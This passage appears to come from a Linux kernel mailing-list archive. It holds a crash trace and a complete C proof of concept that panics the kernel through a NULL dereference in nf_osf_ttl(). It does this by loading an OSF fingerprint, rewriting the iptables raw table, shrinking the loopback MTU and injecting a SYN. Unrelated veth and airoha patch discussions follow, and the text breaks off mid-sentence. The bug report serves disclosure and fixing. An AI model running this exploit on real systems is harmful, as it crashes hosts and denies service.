[ 2.977973] ? timerqueue_linked_add+0x1f4/0x3d0
[ 2.980634] handle_softirqs+0x19f/0x610
[ 2.982012] ? __pfx_handle_softirqs+0x10/0x10
[ 2.984853] do_softirq.part.0+0x3b/0x60
[ 2.986360] </IRQ>
[ 2.987161] <TASK>
[ 2.987845] __local_bh_enable_ip+0x64/0x70
[ 2.989320] __dev_queue_xmit+0x9f7/0x3100
[ 2.990853] ? kvm_clock_get_cycles+0x18/0x30
[ 2.992377] ? ktime_get+0xeb/0x160
[ 2.994640] ? __pfx_skb_set_owner_w+0x10/0x10
[ 2.996116] ? __pfx___dev_queue_xmit+0x10/0x10
[ 2.997850] ? __pfx__copy_from_iter+0x10/0x10
[ 2.999529] ? packet_parse_headers+0x342/0x6b0
[ 3.002132] ? __pfx_packet_parse_headers+0x10/0x10
[ 3.003983] ? _raw_spin_lock_irqsave+0x95/0xf0
[ 3.005551] packet_sendmsg+0x21c2/0x5580
[ 3.007039] ? tty_compat_ioctl+0x238/0x500
[ 3.008445] ? __pfx_ldsem_down_read+0x10/0x10
[ 3.010973] ? _raw_spin_lock_irqsave+0x95/0xf0
[ 3.012634] ? __pfx__raw_spin_lock_irqsave+0x10/0x10
[ 3.014620] ? __pfx_packet_sendmsg+0x10/0x10
[ 3.016292] ? __pfx_aa_sk_perm+0x10/0x10
[ 3.017657] ? __check_object_size+0x4b/0x650
[ 3.019888] __sys_sendto+0x34e/0x3a0
[ 3.021353] ? __pfx___sys_sendto+0x10/0x10
[ 3.022854] ? alloc_fd+0x33b/0x5b0
[ 3.024081] ? ksys_write+0xfc/0x1d0
[ 3.025333] ? __pfx_ksys_write+0x10/0x10
[ 3.027069] __x64_sys_sendto+0xe0/0x1c0
[ 3.028593] do_syscall_64+0x64/0x680
[ 3.030069] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 3.032055] RIP: 0033:0x4243f7
[ 3.033269] Code: ff ff f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b5 0f 1f 00 f3 0f 1e fa 80 3d 6d bc 08 00 00 41 89 ca 74 10 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 69 c3 55 48 89 e5 53 48 83 ec 38 44 89 4d d0
[ 3.039978] RSP: 002b:00007ffc7ab0e508 EFLAGS: 00000202 ORIG_RAX: 000000000000002c
[ 3.042801] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00000000004243f7
[ 3.045585] RDX: 0000000000000036 RSI: 00007ffc7ab0e590 RDI: 0000000000000003
[ 3.048006] RBP: 00007ffc7ab0e5d0 R08: 00007ffc7ab0e540 R09: 0000000000000014
[ 3.050552] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffc7ab0e6f8
[ 3.053184] R13: 00007ffc7ab0e708 R14: 00000000004aaf68 R15: 0000000000000001
[ 3.055872] </TASK>
[ 3.056758] Modules linked in:
[ 3.057796] ---[ end trace 0000000000000000 ]---
[ 3.059605] RIP: 0010:nf_osf_match_one+0x204/0xa70
[ 3.061034] Code: 7f 08 84 c0 0f 85 46 06 00 00 41 3a 4c 24 08 0f 83 17 01 00 00 48 b8 00 00 00 00 00 fc ff df 49 8d 7f 10 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 f8 07 00 00 49 8b 5f 10 48 85 db 0f 84 8f fe ff
[ 3.067353] RSP: 0018:ffffc90000007740 EFLAGS: 00010212
[ 3.069348] RAX: dffffc0000000000 RBX: ffffc90000007878 RCX: 0000000000000040
[ 3.072135] RDX: 0000000000000002 RSI: ffff88800b4f30c0 RDI: 0000000000000010
[ 3.074613] RBP: ffff88800fca4820 R08: 0000000000000000 R09: 0000000000000000
[ 3.076982] R10: 0000000000000001 R11: ffff88800b4b7680 R12: ffff88800b4f30d0
[ 3.079532] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000000
[ 3.082213] FS: 0000000013b96380(0000) GS:ffff8880e2489000(0000) knlGS:0000000000000000
[ 3.085348] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3.087128] CR2: 00000000004a0000 CR3: 000000000fa3f000 CR4: 00000000003006f0
[ 3.089429] Kernel panic - not syncing: Fatal exception in interrupt
[ 3.092322] Kernel Offset: disabled
[ 3.093649] Rebooting in 1 seconds..
```
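As a cross-check of the report, the faulting address can be derived from the accessed offset. The sketch below assumes generic KASAN on x86-64, where one shadow byte covers 8 bytes of memory; the shadow offset is the value visible in RAX in the dump, and `kasan_shadow_addr()` is a hypothetical helper name.

```c
#include <stdint.h>

/* Assumed generic-KASAN parameters for x86-64 (offset matches RAX above). */
#define KASAN_SHADOW_SCALE_SHIFT 3
#define KASAN_SHADOW_OFFSET      0xdffffc0000000000ULL

/* Address of the shadow byte that describes `addr`. */
static uint64_t kasan_shadow_addr(uint64_t addr)
{
    return (addr >> KASAN_SHADOW_SCALE_SHIFT) + KASAN_SHADOW_OFFSET;
}
```

With `addr = 0x10` (RDI in the dump) this gives 0xdffffc0000000002, the non-canonical address in the Oops line, and every address in [0x10, 0x17] maps to that same shadow byte, which is why KASAN reports that range.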
## PoC (standalone C, requires root, compiles with musl or glibc)
```c
/*
* PoC: nf_osf_ttl() NULL pointer dereference (nfnetlink_osf.c)
*
* Trigger: lo MTU set to 67 (< IPV4_MIN_MTU=68) via ioctl
* → NETDEV_CHANGEMTU → !inetdev_valid_mtu(67)
* → inetdev_destroy(lo) → RCU_INIT_POINTER(lo->ip_ptr, NULL)
*
* SYN injected via AF_PACKET on lo → loopback_xmit
* → eth_type_trans → __netif_rx → ip_rcv → PREROUTING
* → xt_osf → nf_osf_match → nf_osf_match_one
* → nf_osf_ttl(skb, TTL_LESS=1, f_ttl=64)
* L34: in_dev = __in_dev_get_rcu(lo) → NULL
* L46: in_dev_for_each_ifa_rcu(ifa, NULL) → CRASH
*
* Requirements (all built-in in target kernel):
* CONFIG_IP_NF_RAW=y, CONFIG_NETFILTER_XT_MATCH_OSF=y,
* CONFIG_NETFILTER_NETLINK_OSF=y, CONFIG_PANIC_ON_OOPS=y
*
* Run as root.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <linux/if.h>
#include <linux/netlink.h>
/* ------------------------------------------------------------------ */
/* Inline definitions — avoid dependency on kernel UAPI headers */
/* ------------------------------------------------------------------ */
/* netlink / netfilter */
#define NETLINK_NETFILTER 12
#define NFNETLINK_V0 0
#define NFNL_SUBSYS_OSF 5
#define NLM_F_REQUEST 0x0001
#define NLM_F_ACK 0x0004
#define NLM_F_CREATE 0x0400
#define NLMSG_ALIGNTO 4
#define NLMSG_ALIGN(len) (((len)+NLMSG_ALIGNTO-1) & ~(NLMSG_ALIGNTO-1))
#define NLMSG_HDRLEN ((int)NLMSG_ALIGN(sizeof(struct nlmsghdr)))
#define NLMSG_LENGTH(len) ((len) + NLMSG_HDRLEN)
#define NLA_ALIGNTO 4
#define NLA_ALIGN(len) (((len)+NLA_ALIGNTO-1) & ~(NLA_ALIGNTO-1))
#define NLA_HDRLEN ((int)NLA_ALIGN(sizeof(struct nlattr)))
#define NLMSG_ERROR 0x2
struct nfgenmsg {
    __u8 nfgen_family;
    __u8 version;
    __be16 res_id;
};

/* OSF netlink */
#define OSF_MSG_ADD 0
#define OSF_ATTR_FINGER 1
#define MAXGENRELEN 32
#define MAX_IPOPTLEN 40
#define OSF_WSS_PLAIN 0

struct nf_osf_wc {
    __u32 wc;
    __u32 val;
};

struct nf_osf_opt {
    __u16 kind;
    __u16 length;
    struct nf_osf_wc wc;
};

struct nf_osf_user_finger {
    struct nf_osf_wc wss;
    __u8 ttl;
    __u8 df;
    __u16 ss;
    __u16 mss;
    __u16 opt_num;
    char genre[MAXGENRELEN];
    char version[MAXGENRELEN];
    char subtype[MAXGENRELEN];
    struct nf_osf_opt opt[MAX_IPOPTLEN];
};
/* iptables / x_tables */
#define XT_TABLE_MAXNAMELEN 32
#define XT_EXTENSION_MAXNAMELEN 29
#define XT_FUNCTION_MAXNAMELEN 30
#define NF_INET_PRE_ROUTING 0
#define NF_INET_LOCAL_OUT 3
#define NF_INET_NUMHOOKS 5
#define NF_ACCEPT 1
#define IPPROTO_TCP 6
#define IPT_SO_SET_REPLACE 64
#define IPT_SO_GET_INFO 64
#define SOL_IP 0
/* XT_ALIGN: align to 8 bytes (alignof struct with u64 member) */
#define XT_ALIGN(s) (((s) + 7) & ~7)
struct xt_counters {
    __u64 pcnt, bcnt;
};

struct ipt_ip {
    struct in_addr src, dst;
    struct in_addr smsk, dmsk;
    char iniface[16], outiface[16];
    unsigned char iniface_mask[16], outiface_mask[16];
    __u16 proto;
    __u8 flags;
    __u8 invflags;
};

struct ipt_entry {
    struct ipt_ip ip;
    unsigned int nfcache;
    __u16 target_offset;
    __u16 next_offset;
    unsigned int comefrom;
    struct xt_counters counters;
    unsigned char elems[0];
};

struct xt_entry_match {
    union {
        struct {
            __u16 match_size;
            char name[XT_EXTENSION_MAXNAMELEN];
            __u8 revision;
        } user;
        __u16 match_size;
    } u;
    unsigned char data[0];
};

struct xt_entry_target {
    union {
        struct {
            __u16 target_size;
            char name[XT_EXTENSION_MAXNAMELEN];
            __u8 revision;
        } user;
        __u16 target_size;
    } u;
    unsigned char data[0];
};

struct xt_standard_target {
    struct xt_entry_target target;
    int verdict;
};

struct xt_error_target {
    struct xt_entry_target target;
    char errorname[XT_FUNCTION_MAXNAMELEN];
};

struct ipt_getinfo {
    char name[XT_TABLE_MAXNAMELEN];
    unsigned int valid_hooks;
    unsigned int hook_entry[NF_INET_NUMHOOKS];
    unsigned int underflow[NF_INET_NUMHOOKS];
    unsigned int num_entries;
    unsigned int size;
};

struct ipt_replace {
    char name[XT_TABLE_MAXNAMELEN];
    unsigned int valid_hooks;
    unsigned int num_entries;
    unsigned int size;
    unsigned int hook_entry[NF_INET_NUMHOOKS];
    unsigned int underflow[NF_INET_NUMHOOKS];
    unsigned int num_counters;
    struct xt_counters *counters;
    /* entries follow */
};
/* nf_osf_info — iptables match data for xt_osf */
#define NF_OSF_GENRE (1 << 0)
#define NF_OSF_TTL_FLAG (1 << 1) /* NF_OSF_TTL in the kernel */
#define NF_OSF_TTL_LESS 1
struct nf_osf_info {
    char genre[MAXGENRELEN];
    __u32 len;
    __u32 flags;
    __u32 loglevel;
    __u32 ttl;
};

/* IP / TCP headers for packet crafting */
struct iphdr {
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
    __u8 ihl:4, version:4;
#else
    __u8 version:4, ihl:4;
#endif
    __u8 tos;
    __u16 tot_len;
    __u16 id;
    __u16 frag_off;
    __u8 ttl;
    __u8 protocol;
    __u16 check;
    __u32 saddr;
    __u32 daddr;
};

struct tcphdr {
    __u16 source;
    __u16 dest;
    __u32 seq;
    __u32 ack_seq;
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
    __u16 res1:4, doff:4, fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
#else
    __u16 doff:4, res1:4, cwr:1, ece:1, urg:1, ack:1, psh:1, rst:1, syn:1, fin:1;
#endif
    __u16 window;
    __u16 check;
    __u16 urg_ptr;
};

/* AF_PACKET / Ethernet */
#ifndef AF_PACKET
#define AF_PACKET 17
#endif
#define ETH_P_IP 0x0800
#define ETH_P_ALL 0x0003
#define ETH_HLEN 14
#define ETH_ALEN 6

struct sockaddr_ll {
    unsigned short sll_family;
    __be16 sll_protocol;
    int sll_ifindex;
    unsigned short sll_hatype;
    unsigned char sll_pkttype;
    unsigned char sll_halen;
    unsigned char sll_addr[8];
};
/* ------------------------------------------------------------------ */
/* Helpers */
/* ------------------------------------------------------------------ */
#define DIE(fmt, ...) do { \
    fprintf(stderr, "[-] " fmt "\n", ##__VA_ARGS__); \
    exit(1); \
} while (0)
#define LOG(fmt, ...) fprintf(stderr, "[*] " fmt "\n", ##__VA_ARGS__)

/* Internet checksum: one's-complement sum of 16-bit words */
static __u16 ip_checksum(const void *buf, int len)
{
    const __u16 *p = buf;
    __u32 sum = 0;

    while (len > 1) {
        sum += *p++;
        len -= 2;
    }
    if (len == 1)
        sum += *(const __u8 *)p; /* trailing odd byte */
    /* fold the carries back into the low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (__u16)~sum;
}
/* ------------------------------------------------------------------ */
/* Step 1: Load OSF fingerprint via nfnetlink */
/* ------------------------------------------------------------------ */
static void load_osf_fingerprint(void)
{
    int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);
    if (fd < 0)
        DIE("socket(NETLINK_NETFILTER): %s", strerror(errno));

    struct sockaddr_nl addr = { .nl_family = AF_NETLINK };
    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        DIE("bind(netlink): %s", strerror(errno));

    struct nf_osf_user_finger finger;
    memset(&finger, 0, sizeof(finger));
    finger.wss.wc = OSF_WSS_PLAIN;
    finger.wss.val = 0;
    finger.ttl = 64;
    finger.df = 0;
    finger.ss = 40;
    finger.mss = 0;
    finger.opt_num = 0;
    strncpy(finger.genre, "Linux", MAXGENRELEN);

    int finger_attr_len = NLA_HDRLEN + sizeof(finger);
    int nfmsg_len = NLMSG_ALIGN(sizeof(struct nfgenmsg)) + NLA_ALIGN(finger_attr_len);
    int total_len = NLMSG_LENGTH(nfmsg_len);
    char *buf = calloc(1, total_len);
    if (!buf)
        DIE("calloc");

    struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
    nlh->nlmsg_len = total_len;
    nlh->nlmsg_type = (NFNL_SUBSYS_OSF << 8) | OSF_MSG_ADD;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_ACK;
    nlh->nlmsg_seq = 1;
    nlh->nlmsg_pid = getpid();

    struct nfgenmsg *nfg = (struct nfgenmsg *)(buf + NLMSG_HDRLEN);
    nfg->nfgen_family = AF_UNSPEC;
    nfg->version = NFNETLINK_V0;
    nfg->res_id = 0;

    struct nlattr *nla = (struct nlattr *)(buf + NLMSG_HDRLEN +
                                           NLMSG_ALIGN(sizeof(struct nfgenmsg)));
    nla->nla_len = finger_attr_len;
    nla->nla_type = OSF_ATTR_FINGER;
    memcpy((char *)nla + NLA_HDRLEN, &finger, sizeof(finger));

    struct sockaddr_nl dest = { .nl_family = AF_NETLINK };
    if (sendto(fd, buf, total_len, 0,
               (struct sockaddr *)&dest, sizeof(dest)) < 0)
        DIE("sendto(OSF_MSG_ADD): %s", strerror(errno));

    char rbuf[4096];
    int n = recv(fd, rbuf, sizeof(rbuf), 0);
    if (n < 0)
        DIE("recv(netlink): %s", strerror(errno));

    struct nlmsghdr *rnlh = (struct nlmsghdr *)rbuf;
    if (rnlh->nlmsg_type == NLMSG_ERROR) {
        int *errp = (int *)(rbuf + NLMSG_HDRLEN);
        if (*errp != 0)
            DIE("OSF fingerprint load failed: %s (err=%d)",
                strerror(-*errp), *errp);
    }
    LOG("OSF fingerprint loaded (genre=Linux, ttl=64, ss=40, df=0)");
    free(buf);
    close(fd);
}
/* ------------------------------------------------------------------ */
/* Step 2: Set up iptables raw table with xt_osf match */
/* ------------------------------------------------------------------ */
#define SIZEOF_IPT_ENTRY (XT_ALIGN(sizeof(struct ipt_entry)))
#define SIZEOF_MATCH_OSF (XT_ALIGN(sizeof(struct xt_entry_match) + sizeof(struct nf_osf_info)))
#define SIZEOF_STD_TARGET (XT_ALIGN(sizeof(struct xt_standard_target)))
#define SIZEOF_ERR_TARGET (XT_ALIGN(sizeof(struct xt_error_target)))
#define ENTRY0_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_MATCH_OSF + SIZEOF_STD_TARGET)
#define ENTRY1_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_STD_TARGET)
#define ENTRY2_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_STD_TARGET)
#define ENTRY3_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_ERR_TARGET)
#define ENTRIES_SIZE (ENTRY0_SIZE + ENTRY1_SIZE + ENTRY2_SIZE + ENTRY3_SIZE)
static void setup_iptables_osf(void)
{
    int rawfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (rawfd < 0)
        DIE("socket(RAW): %s", strerror(errno));

    struct ipt_getinfo info;
    memset(&info, 0, sizeof(info));
    strncpy(info.name, "raw", XT_TABLE_MAXNAMELEN);
    socklen_t optlen = sizeof(info);
    if (getsockopt(rawfd, SOL_IP, IPT_SO_GET_INFO, &info, &optlen) < 0)
        DIE("getsockopt(IPT_SO_GET_INFO): %s", strerror(errno));
    LOG("raw table: valid_hooks=0x%x, num_entries=%u, size=%u",
        info.valid_hooks, info.num_entries, info.size);
    unsigned int old_num_entries = info.num_entries;

    size_t repl_size = sizeof(struct ipt_replace) + ENTRIES_SIZE;
    char *blob = calloc(1, repl_size);
    if (!blob)
        DIE("calloc");

    struct ipt_replace *repl = (struct ipt_replace *)blob;
    strncpy(repl->name, "raw", XT_TABLE_MAXNAMELEN);
    repl->valid_hooks = (1 << NF_INET_PRE_ROUTING) | (1 << NF_INET_LOCAL_OUT);
    repl->num_entries = 4;
    repl->size = ENTRIES_SIZE;

    unsigned int off0 = 0;
    unsigned int off1 = ENTRY0_SIZE;
    unsigned int off2 = ENTRY0_SIZE + ENTRY1_SIZE;
    unsigned int off3 = ENTRY0_SIZE + ENTRY1_SIZE + ENTRY2_SIZE;
    repl->hook_entry[NF_INET_PRE_ROUTING] = off0;
    repl->hook_entry[NF_INET_LOCAL_OUT] = off2;
    repl->underflow[NF_INET_PRE_ROUTING] = off1;
    repl->underflow[NF_INET_LOCAL_OUT] = off2;

    repl->num_counters = old_num_entries;
    struct xt_counters *ctrs = calloc(old_num_entries, sizeof(struct xt_counters));
    if (!ctrs)
        DIE("calloc counters");
    repl->counters = ctrs;

    char *entries = blob + sizeof(struct ipt_replace);

    /* Entry 0: OSF match rule in PREROUTING */
    {
        struct ipt_entry *e = (struct ipt_entry *)(entries + off0);
        memset(e, 0, SIZEOF_IPT_ENTRY);
        e->ip.proto = IPPROTO_TCP;
        e->target_offset = SIZEOF_IPT_ENTRY + SIZEOF_MATCH_OSF;
        e->next_offset = ENTRY0_SIZE;

        struct xt_entry_match *m = (struct xt_entry_match *)(entries + off0 + SIZEOF_IPT_ENTRY);
        memset(m, 0, SIZEOF_MATCH_OSF);
        m->u.user.match_size = SIZEOF_MATCH_OSF;
        strncpy(m->u.user.name, "osf", XT_EXTENSION_MAXNAMELEN);
        m->u.user.revision = 0;

        struct nf_osf_info *osf = (struct nf_osf_info *)m->data;
        memset(osf, 0, sizeof(*osf));
        strncpy(osf->genre, "Linux", MAXGENRELEN);
        osf->flags = NF_OSF_GENRE | NF_OSF_TTL_FLAG;
        osf->ttl = NF_OSF_TTL_LESS;

        struct xt_standard_target *t = (struct xt_standard_target *)
            (entries + off0 + e->target_offset);
        memset(t, 0, SIZEOF_STD_TARGET);
        t->target.u.user.target_size = SIZEOF_STD_TARGET;
        t->verdict = -NF_ACCEPT - 1;
    }

    /* Entry 1: PREROUTING policy (underflow) */
    {
        struct ipt_entry *e = (struct ipt_entry *)(entries + off1);
        memset(e, 0, SIZEOF_IPT_ENTRY);
        e->target_offset = SIZEOF_IPT_ENTRY;
        e->next_offset = ENTRY1_SIZE;

        struct xt_standard_target *t = (struct xt_standard_target *)
            (entries + off1 + SIZEOF_IPT_ENTRY);
        memset(t, 0, SIZEOF_STD_TARGET);
        t->target.u.user.target_size = SIZEOF_STD_TARGET;
        t->verdict = -NF_ACCEPT - 1;
    }

    /* Entry 2: OUTPUT policy (underflow) */
    {
        struct ipt_entry *e = (struct ipt_entry *)(entries + off2);
        memset(e, 0, SIZEOF_IPT_ENTRY);
        e->target_offset = SIZEOF_IPT_ENTRY;
        e->next_offset = ENTRY2_SIZE;

        struct xt_standard_target *t = (struct xt_standard_target *)
            (entries + off2 + SIZEOF_IPT_ENTRY);
        memset(t, 0, SIZEOF_STD_TARGET);
        t->target.u.user.target_size = SIZEOF_STD_TARGET;
        t->verdict = -NF_ACCEPT - 1;
    }

    /* Entry 3: ERROR target */
    {
        struct ipt_entry *e = (struct ipt_entry *)(entries + off3);
        memset(e, 0, SIZEOF_IPT_ENTRY);
        e->target_offset = SIZEOF_IPT_ENTRY;
        e->next_offset = ENTRY3_SIZE;

        struct xt_error_target *t = (struct xt_error_target *)
            (entries + off3 + SIZEOF_IPT_ENTRY);
        memset(t, 0, SIZEOF_ERR_TARGET);
        t->target.u.user.target_size = SIZEOF_ERR_TARGET;
        strncpy(t->target.u.user.name, "ERROR", XT_EXTENSION_MAXNAMELEN);
        strncpy(t->errorname, "ERROR", XT_FUNCTION_MAXNAMELEN);
    }

    LOG("Replacing raw table: %u entries, %u bytes", repl->num_entries, repl->size);
    if (setsockopt(rawfd, SOL_IP, IPT_SO_SET_REPLACE, blob, repl_size) < 0)
DIE("setsockopt(IPT_SO_SET_REPLACE): %s (errno=%d)",
strerror(errno), errno);
LOG("iptables raw table replaced with OSF match rule");
free(ctrs);
free(blob);
close(rawfd);
}
/* ------------------------------------------------------------------ */
/* Step 3: Destroy lo's in_dev via MTU trick */
/* ------------------------------------------------------------------ */
/*
* loopback driver (loopback.c) uses gen_lo_setup() which does NOT call
* ether_setup(), so dev->min_mtu stays at the default 0.
* This allows setting MTU below IPV4_MIN_MTU (68).
*
* Setting MTU to 67 triggers:
* NETDEV_CHANGEMTU → !inetdev_valid_mtu(67)
* → fallthrough → inetdev_destroy(in_dev)
* → RCU_INIT_POINTER(dev->ip_ptr, NULL)
*/
static void setup_loopback(void)
{
int sfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sfd < 0) DIE("socket(DGRAM): %s", strerror(errno));
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
ifr.ifr_mtu = 67;
if (ioctl(sfd, SIOCSIFMTU, &ifr) < 0)
DIE("ioctl(SIOCSIFMTU lo 67): %s", strerror(errno));
close(sfd);
LOG("lo: MTU set to 67 → inetdev_destroy → ip_ptr = NULL");
}
/* ------------------------------------------------------------------ */
/* Step 4: Inject crafted SYN packet via AF_PACKET on lo */
/* ------------------------------------------------------------------ */
static void inject_syn(void)
{
/*
* lo ifindex is always LOOPBACK_IFINDEX = 1,
* but we look it up to be safe.
*/
int sfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sfd < 0) DIE("socket(DGRAM): %s", strerror(errno));
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
if (ioctl(sfd, SIOCGIFINDEX, &ifr) < 0)
DIE("SIOCGIFINDEX(lo): %s", strerror(errno));
int ifindex = ifr.ifr_ifindex;
close(sfd);
LOG("lo: ifindex=%d", ifindex);
int pfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (pfd < 0)
DIE("socket(AF_PACKET): %s", strerror(errno));
/*
* 54-byte Ethernet frame: [14 ETH][20 IP][20 TCP]
*
* loopback_xmit() calls eth_type_trans(skb, dev) which:
* - Strips ETH header, sets skb->protocol from EtherType
* - Sets pkt_type based on DST MAC vs dev MAC
* - lo MAC = 00:00:00:00:00:00 → DST=all-zeros → PACKET_HOST
* Then calls __netif_rx(skb) → RX path → ip_rcv → PREROUTING.
*
* IP: TTL=255 > fingerprint TTL(64) → takes TTL_LESS path in nf_osf_ttl
* DF=0 → matches fingerprint df=0 → nf_osf_fingers[0]
* tot_len=40 → matches fingerprint ss=40
* TCP: SYN=1, doff=5, no options → matches opt_num=0
*/
char frame[54];
memset(frame, 0, sizeof(frame));
/* Ethernet header: DST=00:00:00:00:00:00 (lo MAC → PACKET_HOST) */
unsigned char *eth = (unsigned char *)frame;
/* DST already zero from memset */
eth[ETH_ALEN + 5] = 0x01; /* SRC: 00:00:00:00:00:01 */
eth[12] = (ETH_P_IP >> 8) & 0xff; /* EtherType: 0x0800 (IPv4) */
eth[13] = ETH_P_IP & 0xff;
/* IP header */
struct iphdr *ip = (struct iphdr *)(frame + ETH_HLEN);
ip->version = 4;
ip->ihl = 5;
ip->tot_len = htons(40);
ip->id = htons(0x1234);
ip->frag_off = 0; /* DF=0 */
ip->ttl = 255; /* > fingerprint TTL 64 */
ip->protocol = IPPROTO_TCP;
ip->saddr = inet_addr("10.0.0.2");
ip->daddr = inet_addr("10.0.0.1");
ip->check = 0;
ip->check = ip_checksum(ip, 20);
/* TCP header */
struct tcphdr *tcp = (struct tcphdr *)(frame + ETH_HLEN + 20);
tcp->source = htons(12345);
tcp->dest = htons(80);
tcp->seq = htonl(0xdeadbeef);
tcp->doff = 5; /* no TCP options */
tcp->syn = 1;
tcp->window = htons(1024);
LOG("Injecting SYN via lo: TTL=255, DF=0, tot_len=40, SYN");
LOG("Crash path: AF_PACKET → loopback_xmit → __netif_rx");
LOG(" → ip_rcv(lo) → NF_INET_PRE_ROUTING → xt_osf");
LOG(" → nf_osf_ttl: __in_dev_get_rcu(lo) = NULL → CRASH");
struct sockaddr_ll sll;
memset(&sll, 0, sizeof(sll));
sll.sll_family = AF_PACKET;
sll.sll_protocol = htons(ETH_P_IP);
sll.sll_ifindex = ifindex;
sll.sll_halen = ETH_ALEN;
/* sll_addr left as zeros (matching lo MAC) */
ssize_t n = sendto(pfd, frame, sizeof(frame), 0,
(struct sockaddr *)&sll, sizeof(sll));
if (n < 0)
DIE("sendto(AF_PACKET): %s", strerror(errno));
LOG("Packet injected (%zd bytes), waiting for kernel crash...", n);
close(pfd);
}
/* ------------------------------------------------------------------ */
/* main */
/* ------------------------------------------------------------------ */
int main(void)
{
LOG("=== nf_osf_ttl() NULL pointer dereference PoC ===");
LOG("Method: loopback MTU trick (MTU=67 < 68 → inetdev_destroy)");
/* Step 1: Load OSF fingerprint */
load_osf_fingerprint();
/* Step 2: Set up iptables raw table with OSF match */
setup_iptables_osf();
/* Step 3: Destroy lo's in_dev by setting MTU < IPV4_MIN_MTU */
setup_loopback();
/* Step 4: Inject SYN packet → triggers NULL deref */
inject_syn();
/* If we reach here, the bug didn't trigger */
sleep(3);
LOG("No crash detected — bug may be patched in this kernel.");
return 1;
}
```
* Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: Aleksandr Nogikh @ 2026-04-14 8:33 UTC (permalink / raw)
To: syzbot+cib904ea9ebb647254, hawk
Cc: netdev, linux-kernel, syzkaller-bugs, syzbot
In-Reply-To: <69dd48c2.a00a0220.468cb.004e.GAE@google.com>
(forgot to Cc the right list)
Hmm, just fixed a problem that may have affected `syz test` processing,
let's try again:
#syz test
---
drivers/net/veth.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/veth.c b/drivers/net/veth.c
index 911e7e36e166..9d7b085c9548 100644
--- a/drivers/net/veth.c
+++ b/drivers/net/veth.c
@@ -1138,7 +1138,9 @@ static void veth_napi_del_range(struct net_device *dev, int start, int end)
*/
peer = rtnl_dereference(priv->peer);
if (peer) {
- for (i = start; i < end; i++)
+ int peer_end = min(end, (int)peer->real_num_tx_queues);
+
+ for (i = start; i < peer_end; i++)
netdev_tx_reset_queue(netdev_get_tx_queue(peer, i));
}
* Re: [net-next] net: airoha: Wait for TX to complete in airoha_dev_stop()
From: Paolo Abeni @ 2026-04-14 8:29 UTC (permalink / raw)
To: lorenzo
Cc: edumazet, kuba, davem, netdev, andrew+netdev, pabeni,
linux-arm-kernel, linux-mediatek
In-Reply-To: <20260411-airoha-fix-ndo_stop-v1-1-caddaa181739@kernel.org>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
For local reproduction steps see https://netdev-ai.bots.linux.dev/ai-local.html
---
net: airoha: Wait for TX to complete in airoha_dev_stop()
Wait for TX to complete in airoha_dev_stop routine before stopping the
TX DMA and run airoha_qdma_cleanup_tx_queue routine. Moreover,
start/stop TX/RX NAPIs in ndo_open()/ndo_stop() callbacks in order to be
sure the TX NAPIs have completed before stopping the TX DMA engine in
airoha_dev_stop routine.
> diff --git a/drivers/net/ethernet/airoha/airoha_eth.c b/drivers/net/ethernet/airoha/airoha_eth.c
> index 8e4b043af4bc..9e40c8f375c1 100644
> --- a/drivers/net/ethernet/airoha/airoha_eth.c
> +++ b/drivers/net/ethernet/airoha/airoha_eth.c
[ ... ]
> @@ -1684,18 +1686,26 @@ static int airoha_dev_stop(struct net_device *dev)
> struct airoha_qdma *qdma = port->qdma;
> int i, err;
>
> - netif_tx_disable(dev);
> err = airoha_set_vip_for_gdm_port(port, false);
> if (err)
> return err;
>
> - for (i = 0; i < ARRAY_SIZE(qdma->q_tx); i++)
> - netdev_tx_reset_subqueue(dev, i);
> -
> airoha_set_gdm_port_fwd_cfg(qdma->eth, REG_GDM_FWD_CFG(port->id),
> FE_PSE_PORT_DROP);
>
> + netif_tx_disable(dev);
> if (atomic_dec_and_test(&qdma->users)) {
> + u32 val;
> +
> + /* Wait for TX to complete */
> + err = read_poll_timeout(airoha_qdma_rr, val,
> + !(val & GLOBAL_CFG_TX_DMA_BUSY_MASK),
> + USEC_PER_MSEC, 100 * USEC_PER_MSEC,
> + false, qdma, REG_QDMA_GLOBAL_CFG);
> + if (err)
> + return err;
> ^^^^^^^^^^
Can this leave the device in an inconsistent state? When read_poll_timeout()
fails (TX DMA busy for more than 100ms), airoha_dev_stop() returns an error
immediately. However, atomic_dec_and_test(&qdma->users) has already
decremented qdma->users to 0, but airoha_qdma_stop_napi() was never called,
so all NAPIs remain enabled.
The networking core (__dev_close_many in net/core/dev.c) ignores the
ndo_stop return value and marks the device as down regardless. When the
